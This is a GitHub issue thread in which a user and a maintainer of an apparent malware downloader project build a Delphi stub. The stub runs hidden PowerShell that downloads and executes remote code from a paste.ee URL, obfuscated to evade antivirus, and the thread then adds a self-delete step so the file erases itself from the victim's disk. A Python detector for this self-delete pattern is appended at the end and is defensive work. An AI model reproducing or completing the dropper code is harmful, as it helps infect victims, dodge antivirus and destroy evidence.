Self Destruct Feature

Open msfcon5ol3 opened this issue 2 years ago • 9 comments

This code snippet below is Delphi based, I was gonna use C# but too many AV detections. Could you help me to add a self-destruct function to delete the file from the disk after execution? Thanks for your help.

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'IEX(New-Object Net.WebClient).”`D`o`wn`l`oa`d`Str`in`g”(‘htt’ + ‘ps://’ + ‘paste.ee/r/l2tlb/0’)', nil, SW_HIDE);
end.

msfcon5ol3 • Jan 20 '23 01:01

In the powershell command add a delay and then a command to remove the file (itself).

UnamSanctam • Jan 20 '23 02:01

This worked but if there's a case in which the file is renamed by the victim, this makes this command useless. What could I do here instead of using the file name as the method of deletion?

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'start calc.exe;Remove-Item payload.exe -Force', nil, SW_HIDE);
end.

msfcon5ol3 • Jan 20 '23 02:01

You could try using ParamStr(0) (in Delphi, not in the powershell command) instead to get the current executable path.

UnamSanctam • Jan 20 '23 02:01

Could you edit the code for me please? I'm a noob in Delphi.

msfcon5ol3 • Jan 20 '23 02:01

Would probably be something like:

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'start calc.exe;Remove-Item ''' + ParamStr(0) + ''' -Force', nil, SW_HIDE);
end.

UnamSanctam • Jan 20 '23 03:01

Thanks but compilation error, I'm still trying to fix it....

msfcon5ol3 • Jan 20 '23 03:01

If you haven't already solved it then you might be able to do:

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', PChar('start calc.exe;Remove-Item ''' + ParamStr(0) + ''' -Force'), nil, SW_HIDE);
end.

UnamSanctam • Jan 20 '23 10:01

Thanks, finally it worked like a charm, really appreciate your help. If you want you can add this as a new stub in UnamDownloader for the next release, but you may have to add some Delphi / Pascal compiler to your repository and the other options such as start delay, fake error, run as admin etc.

msfcon5ol3 • Jan 20 '23 12:01

No problem and great that it worked. And I probably won't use it since I'm planning on other things but thank you.

UnamSanctam • Jan 20 '23 15:01
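
For defenders, the pattern this thread arrives at (a PowerShell child process whose command line deletes the executable that launched it) can be matched in process-creation telemetry. The following is an added example, not code from the thread or from the UnamDownloader project; the function names are hypothetical and the events are constructed samples that use the Sysmon Event ID 1 field names Image, ParentImage and CommandLine.

```python
import ntpath
import re

# Remove-Item and its built-in PowerShell aliases.
DELETE_VERBS = {"remove-item", "ri", "rm", "rmdir", "del", "erase", "rd"}
# PowerShell accepts curly quotes as quote characters; fold them to ASCII.
CURLY = str.maketrans({"\u2018": "'", "\u2019": "'", "\u201c": '"', "\u201d": '"'})
TOKEN = re.compile(r"""'[^']*'|"[^"]*"|[^\s;]+""")


def deleted_targets(command_line):
    """Return the path argument of each delete command, normalized for matching."""
    # A backtick before an ordinary character is a no-op escape, so drop it.
    text = command_line.translate(CURLY).replace("`", "").lower()
    tokens = TOKEN.findall(text)
    targets = []
    for i, token in enumerate(tokens):
        if token in DELETE_VERBS:
            # The first following token that is not a -Parameter name is the path.
            arg = next((t for t in tokens[i + 1:] if not t.startswith("-")), None)
            if arg:
                targets.append(arg.strip("'\""))
    return targets


def is_self_delete(event):
    """True when a PowerShell child deletes the image of the process that spawned it."""
    if ntpath.basename(event["Image"]).lower() not in {"powershell.exe", "pwsh.exe"}:
        return False
    parent = event["ParentImage"].lower()
    # Compare against ParentImage rather than a fixed file name, so a renamed
    # file still matches; a bare file name (relative path) is accepted too.
    names = (parent, ntpath.basename(parent))
    return any(target in names for target in deleted_targets(event["CommandLine"]))


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [  # constructed samples, not captured telemetry
    {"Image": PS, "ParentImage": r"C:\Users\alice\Downloads\renamed copy.exe",
     "CommandLine": r"powershell start calc.exe;Remove-Item 'C:\Users\alice\Downloads\renamed copy.exe' -Force"},
    {"Image": PS, "ParentImage": r"C:\Users\bob\Desktop\payload.exe",
     "CommandLine": r"powershell Start-Sleep 3; Re`move-`Item payload.exe -Force"},
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell Remove-Item C:\Temp\build.log"},
]

if __name__ == "__main__":
    for event in EVENTS:
        print(is_self_delete(event), event["ParentImage"])
```

The check is a triage heuristic: legitimate installers and updaters also remove their own bootstrap executable, so a hit is a lead to correlate with other activity from the same parent process.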